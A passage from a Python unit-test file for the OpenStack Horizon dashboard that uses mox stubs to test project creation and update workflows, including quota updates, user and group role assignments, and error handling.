neutron_updated_quota = dict([(key, quota_data.get(key).limit)
for key in quotas.NEUTRON_QUOTA_FIELDS])
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'security-group').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest), 'quotas') \
.MultipleTimes().AndReturn(True)
api.neutron.tenant_quota_update(IsA(http.HttpRequest),
self.tenant.id,
**neutron_updated_quota)
self.test_add_project_post(neutron=True)
@test.create_stubs({api.keystone: ('user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas')})
def test_add_project_quota_defaults_error(self):
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.nova)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:create')
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
self.assertContains(res, "Unable to retrieve default quota values")
def test_add_project_quota_defaults_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_quota_defaults_error()
@test.create_stubs({api.keystone: ('tenant_create',
'user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_add_project_tenant_create_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndRaise(self.exceptions.keystone)
self.mox.ReplayAll()
workflow_data = self._get_workflow_data(project, quota)
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_tenant_create_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_tenant_create_error()
@test.create_stubs({api.keystone: ('tenant_create',
'user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role',
'add_tenant_user_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages'),
api.nova: ('tenant_quota_update',)})
def test_add_project_quota_update_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
quota_data = self._get_quota_info(quota)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndReturn(project)
workflow_data = {}
for role in roles:
if USER_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[USER_ROLE_PREFIX + role.id]
for user_id in ulist:
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user=user_id,
role=role.id)
for role in roles:
if GROUP_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[GROUP_ROLE_PREFIX + role.id]
for group_id in ulist:
api.keystone.add_group_role(IsA(http.HttpRequest),
role=role.id,
group=group_id,
project=self.tenant.id)
nova_updated_quota = dict([(key, quota_data[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
workflow_data.update(self._get_workflow_data(project, quota))
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_quota_update_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_quota_update_error()
@test.create_stubs({api.keystone: ('tenant_create',
'user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role',
'add_tenant_user_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages'),
api.cinder: ('tenant_quota_update',),
api.nova: ('tenant_quota_update',)})
def test_add_project_user_update_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
quota_data = self._get_quota_info(quota)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndReturn(project)
workflow_data = {}
for role in roles:
if USER_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[USER_ROLE_PREFIX + role.id]
for user_id in ulist:
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user=user_id,
role=role.id) \
.AndRaise(self.exceptions.keystone)
break
break
nova_updated_quota = dict([(key, quota_data[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota)
cinder_updated_quota = dict([(key, quota_data[key]) for key in
quotas.CINDER_QUOTA_FIELDS])
api.cinder.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**cinder_updated_quota)
self.mox.ReplayAll()
workflow_data.update(self._get_workflow_data(project, quota))
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_user_update_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_user_update_error()
@test.create_stubs({api.keystone: ('user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_add_project_missing_field_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
self.mox.ReplayAll()
workflow_data = self._get_workflow_data(project, quota)
workflow_data["name"] = ""
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertContains(res, "field is required")
def test_add_project_missing_field_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_missing_field_error()
class UpdateProjectWorkflowTests(test.BaseAdminViewTests):
def _get_quota_info(self, quota):
cinder_quota = self.cinder_quotas.first()
neutron_quota = self.neutron_quotas.first()
quota_data = {}
for field in quotas.NOVA_QUOTA_FIELDS:
quota_data[field] = int(quota.get(field).limit)
for field in quotas.CINDER_QUOTA_FIELDS:
quota_data[field] = int(cinder_quota.get(field).limit)
for field in quotas.NEUTRON_QUOTA_FIELDS:
quota_data[field] = int(neutron_quota.get(field).limit)
return quota_data
def _get_all_users(self, domain_id):
if not domain_id:
users = self.users.list()
else:
users = [user for user in self.users.list()
if user.domain_id == domain_id]
return users
def _get_all_groups(self, domain_id):
if not domain_id:
groups = self.groups.list()
else:
groups = [group for group in self.groups.list()
if group.domain_id == domain_id]
return groups
def _get_proj_users(self, project_id):
return [user for user in self.users.list()
if user.project_id == project_id]
def _get_proj_groups(self, project_id):
return [group for group in self.groups.list()
if group.project_id == project_id]
def _get_proj_role_assignment(self, project_id):
project_scope = {'project': {'id': project_id}}
return self.role_assignments.filter(scope=project_scope)
def _check_role_list(self, keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data):
if keystone_api_version >= 3:
# admin role with attempt to remove current admin, results in
# warning message
workflow_data[USER_ROLE_PREFIX + "1"] = ['3']
# member role
workflow_data[USER_ROLE_PREFIX + "2"] = ['1', '3']
# admin role
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['2', '3']
# member role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['1', '2', '3']
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
# Give user 1 role 2
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='1',
role='2',)
# remove role 2 from user 2
api.keystone.remove_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='2',
role='2')
# Give user 3 role 1
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='3',
role='1',)
api.keystone.group_list(IsA(http.HttpRequest),
domain=self.domain.id,
project=self.tenant.id) \
.AndReturn(groups)
api.keystone.roles_for_group(IsA(http.HttpRequest),
group='1',
project=self.tenant.id) \
.AndReturn(roles)
api.keystone.remove_group_role(IsA(http.HttpRequest),
project=self.tenant.id,
group='1',
role='1')
api.keystone.roles_for_group(IsA(http.HttpRequest),
group='2',
project=self.tenant.id) \
.AndReturn(roles)
api.keystone.roles_for_group(IsA(http.HttpRequest),
group='3',
project=self.tenant.id) \
.AndReturn(roles)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
# admin user - try to remove all roles on current project, warning
api.keystone.roles_for_user(IsA(http.HttpRequest), '1',
self.tenant.id).AndReturn(roles)
# member user 1 - has role 1, will remove it
api.keystone.roles_for_user(IsA(http.HttpRequest), '2',
self.tenant.id).AndReturn((roles[1],))
# member user 3 - has role 2
api.keystone.roles_for_user(IsA(http.HttpRequest), '3',
self.tenant.id).AndReturn((roles[0],))
# add role 2
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='3',
role='2')\
.AndRaise(self.exceptions.keystone)
@test.create_stubs({api.keystone: ('get_default_role',
'roles_for_user',
'tenant_get',
'domain_get',
'user_list',
'roles_for_group',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas')})
def test_update_project_get(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
proj_users = self._get_proj_users(project.id)
role_assignments = self._get_proj_role_assignment(project.id)
api.keystone.tenant_get(IsA(http.HttpRequest),
self.tenant.id, admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
workflow = res.context['workflow']
self.assertEqual(res.context['workflow'].name,
workflows.UpdateProject.name)
step = workflow.get_step("update_info")
self.assertEqual(step.action.initial['ram'], quota.get('ram').limit)
self.assertEqual(step.action.initial['injected_files'],
quota.get('injected_files').limit)
self.assertEqual(step.action.initial['name'], project.name)
self.assertEqual(step.action.initial['description'],
project.description)
self.assertQuerysetEqual(
workflow.steps,
['<UpdateProjectInfo: update_info>',
'<UpdateProjectMembers: update_members>',
'<UpdateProjectGroups: update_group_members>',
'<UpdateProjectQuota: update_quotas>'])
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user_role',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
api.nova: ('tenant_quota_update',),
api.cinder: ('tenant_quota_update',),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_update_project_save(self, neutron=False):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
proj_users = self._get_proj_users(project.id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
role_assignments = self._get_proj_role_assignment(project.id)
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest),
self.tenant.id, admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
if neutron:
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
workflow_data[USER_ROLE_PREFIX + "1"] = ['3'] # admin role
workflow_data[USER_ROLE_PREFIX + "2"] = ['2'] # member role
# Group assignment form data
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['3'] # admin role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['2'] # member role
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota.metadata_items = 444
quota.volumes = 444
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndReturn(project)
self._check_role_list(keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data)
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
nova_updated_quota = dict([(key, updated_quota[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota)
cinder_updated_quota = dict([(key, updated_quota[key]) for key in
quotas.CINDER_QUOTA_FIELDS])
api.cinder.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**cinder_updated_quota)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=0, warning=1)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('is_extension_supported',
'tenant_quota_get',
'tenant_quota_update')})
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_update_project_save_with_neutron(self):
quota_data = self.neutron_quotas.first()
neutron_updated_quota = dict([(key, quota_data.get(key).limit)
for key in quotas.NEUTRON_QUOTA_FIELDS])
api.neutron.is_extension_supported(IsA(http.HttpRequest), 'quotas') \
.MultipleTimes().AndReturn(True)
api.neutron.tenant_quota_get(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota_data)
api.neutron.tenant_quota_update(IsA(http.HttpRequest),
self.tenant.id,
**neutron_updated_quota)
self.test_update_project_save(neutron=True)
@test.create_stubs({api.keystone: ('tenant_get',)})
def test_update_project_get_error(self):
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages',),
api.nova: ('tenant_quota_update',)})
def test_update_project_tenant_update_error(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
proj_users = self._get_proj_users(project.id)
role_assignments = self.role_assignments.list()
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
role_ids = [role.id for role in roles]
for user in proj_users:
if role_ids:
workflow_data.setdefault(USER_ROLE_PREFIX + role_ids[0], []) \
.append(user.id)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
role_ids = [role.id for role in roles]
for group in groups:
if role_ids:
workflow_data.setdefault(GROUP_ROLE_PREFIX + role_ids[0], []) \
.append(group.id)
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota.metadata_items = 444
quota.volumes = 444
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndRaise(self.exceptions.keystone)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user_role',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages',),
api.nova: ('tenant_quota_update',)})
def test_update_project_quota_update_error(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
proj_users = self._get_proj_users(project.id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
role_assignments = self._get_proj_role_assignment(project.id)
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
workflow_data[USER_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[USER_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
# Group role assignment data
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota[0].limit = 444
quota[1].limit = -1
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndReturn(project)
self._check_role_list(keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data)
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
nova_updated_quota = dict([(key, updated_quota[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=2, warning=1)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user_role',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_update_project_member_update_error(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
proj_users = self._get_proj_users(project.id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
role_assignments = self._get_proj_role_assignment(project.id)
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
workflow_data[USER_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[USER_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota.metadata_items = 444
quota.volumes = 444
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndReturn(project)
